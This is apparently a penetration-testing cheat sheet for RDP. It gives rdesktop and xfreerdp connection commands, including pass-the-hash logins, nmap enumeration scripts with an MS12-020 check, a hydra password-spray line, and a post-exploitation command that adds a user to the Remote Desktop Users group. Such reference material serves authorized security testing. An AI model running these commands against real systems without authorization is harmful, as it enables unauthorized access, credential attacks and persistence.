RDP
Last updated: May 4th, 2023Connecting
rdesktop -u user x.x.x.x
rdesktop -d domain -u user -p pass123 x.x.x.x
xfreerdp [/d:domain] /u:user /p:pass123 /v:x.x.x.x +clipboard
xfreerdp [/d:domain] /u:user /pth:hash /v:x.x.x.x #Pass the hash
Enum
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 x.x.x.x
Brute
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp
Post
#add to rdp group
net localgroup "Remote Desktop Users" UserLoginName /add